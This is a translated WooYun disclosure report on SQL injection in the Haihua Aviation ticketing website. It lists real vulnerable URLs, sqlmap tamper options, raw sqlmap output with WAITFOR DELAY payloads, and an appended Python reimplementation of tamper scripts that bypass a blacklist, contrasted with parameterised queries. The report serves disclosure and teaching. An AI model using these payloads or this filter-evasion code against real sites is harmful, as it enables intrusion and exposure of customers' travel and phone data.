
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0121965

Title: Multiple SQL injection vulnerabilities in the 海华航空 (Haihua Aviation) ticketing system (leak of users' flight and train ticket, phone number and order data)

Vendor: 海华航空

Author: 路人甲

Submitted: 2015-06-25 14:26

Fixed: 2015-08-13 18:22

Published: 2015-08-13 18:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-06-25: Details sent to the vendor, awaiting vendor action
2015-06-29: Vendor confirmed; details visible to the vendor only
2015-07-09: Details disclosed to core white hats and domain experts
2015-07-19: Details disclosed to regular white hats
2015-07-29: Details disclosed to intern white hats
2015-08-13: Details disclosed to the public

Brief description:

Some weren't fully fixed, some got through with tamper scripts, some haven't been submitted before!~~~

Detailed description:

1. First location

http://www.h-h.com.cn/visa/visa_list.aspx?s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81&key=12


Add the parameters --dbms "Microsoft SQL Server 2005" --threads 10 --tamper between.py,randomcase.py,space2comment.py

[Screenshots: 1.jpg to 6.jpg]


2. Second location

http://www.h-h.com.cn/Hotel/SearchList.aspx?CityCode=SHA&CheckInDate=2015-06-24&CheckOutDate=2015-06-29&HotelName=1&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=12&Rank=&MinPrice=&MaxPrice=


[Screenshots: 1.jpg, 2.jpg]


3. Third location

http://www.h-h.com.cn/view_news.aspx?id=20


Not fully fixed; injection still works with tamper scripts

[Screenshot: 1.jpg]

Add the parameters --dbms "Microsoft SQL Server 2005" --threads 10 --tamper between.py,randomcase.py,space2comment.py

[Screenshots: 2.jpg, 3.jpg]


4. Fourth location

http://www.h-h.com.cn/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc


Add the parameters --dbms "Microsoft SQL Server 2005" --threads 10 --tamper between.py,randomcase.py,space2comment.py

sqlmap identified the following injection points with a total of 2408 HTTP(s) requests:
---
Place: GET
Parameter: stype
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: stype='; WAITFOR DELAY '0:0:5'--&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: stype=' WAITFOR DELAY '0:0:5'--&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

Place: GET
Parameter: sdate
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: stype=&ptype=&ddw=1&sdate=2015-3-17'); WAITFOR DELAY '0:0:5'--&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: stype=&ptype=&ddw=1&sdate=2015-3-17') WAITFOR DELAY '0:0:5'--&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

Place: GET
Parameter: ptype
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: stype=&ptype='; WAITFOR DELAY '0:0:5'--&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: stype=&ptype=' WAITFOR DELAY '0:0:5'--&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

Place: GET
Parameter: edate
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17'); WAITFOR DELAY '0:0:5'--&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17') WAITFOR DELAY '0:0:5'--&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc
---
[17:11:20] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: stype, type: Single quoted string (default)
[1] place: GET, parameter: ptype, type: Single quoted string
[2] place: GET, parameter: sdate, type: Single quoted string
[3] place: GET, parameter: edate, type: Single quoted string
[q] Quit
> 0
[17:12:01] [INFO] testing Microsoft SQL Server
[17:12:01] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[17:12:08] [INFO] confirming Microsoft SQL Server
[17:12:18] [INFO] adjusting time delay to 3 seconds due to good response times
[17:12:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005


Proof of vulnerability:

As above

Fix recommendation:

Filter and fix, you know!~~~

Copyright notice: when reposting, credit the source as 路人甲@乌云
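The sqlmap run above warns that the changes made by the tamper scripts are not shown in the listed payloads, and the report's point is that a "filter" patch was bypassed by exactly those scripts. The following is an added example, not code from the original report, from sqlmap, or from the vendor: it reimplements between.py, randomcase.py and space2comment.py in simplified form, pushes the reported stype payloads through them, shows a hypothetical blacklist of the kind a quick filter fix installs letting the tampered versions through, and puts a parameterised query next to the concatenated one so the real fix is visible. The blacklist, the flights table and the sqlite3 backend are constructed assumptions (sqlite3 has no WAITFOR, so a boolean payload is used for the query comparison); the real site runs ASP.NET on Microsoft SQL Server 2005.

```python
import random
import re
import sqlite3

# Payloads copied from the sqlmap output above for the stype parameter, plus a
# boolean-based one so that between.py has an '=' comparison to rewrite.
PAYLOADS = {
    "stacked": "'; WAITFOR DELAY '0:0:5'--",
    "time_based": "' WAITFOR DELAY '0:0:5'--",
    "boolean": "' AND 1=1--",
}

# Keywords whose case randomcase.py may change (illustrative subset).
KEYWORDS = ("WAITFOR", "DELAY", "AND", "OR", "NOT", "BETWEEN", "SELECT", "UNION")


def tamper_between(payload):
    """Simplified between.py: '> x' becomes 'NOT BETWEEN 0 AND x' and
    '= x' becomes 'BETWEEN x AND x', so the filtered operators disappear."""
    payload = re.sub(r"\s*>\s*(\w+)", r" NOT BETWEEN 0 AND \1", payload)
    return re.sub(r"\s*=\s*(\w+)", r" BETWEEN \1 AND \1", payload)


def tamper_randomcase(payload, seed=0):
    """Simplified randomcase.py: randomise the case of every keyword character.
    The seed makes the output reproducible; sqlmap itself uses true randomness."""
    rng = random.Random(seed)

    def flip(match):
        return "".join(rng.choice((c.lower(), c.upper())) for c in match.group(0))

    return re.sub(r"\b(" + "|".join(KEYWORDS) + r")\b", flip, payload, flags=re.IGNORECASE)


def tamper_space2comment(payload):
    """Simplified space2comment.py: spaces become /**/ except inside a string
    literal. As in sqlmap, quote tracking starts only after the first space,
    because the payload's leading quote closes the application's own string."""
    out, in_quote, seen_space = [], False, False
    for ch in payload:
        if ch == " " and (not seen_space or not in_quote):
            seen_space = True
            out.append("/**/")
            continue
        if seen_space and ch == "'":
            in_quote = not in_quote
        out.append(ch)
    return "".join(out)


def tamper_chain(payload, seed=0):
    """Apply the scripts in the order given on the sqlmap command line."""
    return tamper_space2comment(tamper_randomcase(tamper_between(payload), seed))


# Hypothetical blacklist of the kind a quick "filter" fix installs: exact,
# case-sensitive, space-delimited tokens. Not the vendor's actual code.
BLACKLIST = ("WAITFOR DELAY", " AND ", " OR ", "=", "UNION SELECT")


def blacklist_blocks(value):
    """True if the naive filter would reject this request parameter."""
    return any(token in value for token in BLACKLIST)


def build_db():
    """Constructed in-memory stand-in for the flight search backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE flights (id INTEGER PRIMARY KEY, stype TEXT)")
    conn.executemany("INSERT INTO flights (stype) VALUES (?)",
                     [("domestic",), ("international",), ("charter",)])
    return conn


def unsafe_search(conn, stype):
    """The query shape behind the finding: user input concatenated into SQL."""
    sql = "SELECT id FROM flights WHERE stype = '%s'" % stype
    return [row[0] for row in conn.execute(sql)]


def safe_search(conn, stype):
    """The real fix: bind the input as data so no tamper script can help."""
    cur = conn.execute("SELECT id FROM flights WHERE stype = ?", (stype,))
    return [row[0] for row in cur]


if __name__ == "__main__":
    for name, raw in PAYLOADS.items():
        tampered = tamper_chain(raw)
        print(f"{name:10} blocked raw={blacklist_blocks(raw)} "
              f"blocked tampered={blacklist_blocks(tampered)}  {tampered}")
    db = build_db()
    print("unsafe_search:", unsafe_search(db, "' OR '1'='1"))
    print("safe_search:  ", safe_search(db, "' OR '1'='1"))
```

Run as-is and the three raw payloads are rejected by the blacklist while every tampered one passes: between.py removes the `=`, randomcase.py defeats case-sensitive matching, and space2comment.py removes the spaces the tokens depend on. The parameterised `safe_search` returns no rows for the injected value, whereas the concatenated `unsafe_search` returns every row, which is why a token blacklist is not a fix for this class of bug.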


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-06-29 18:21

Vendor reply:

CNVD confirmed and reproduced the described issue; it has been forwarded by CNCERT to the civil aviation industry evaluation centre, which will coordinate handling with the site's operating organisation.

Latest status:

None yet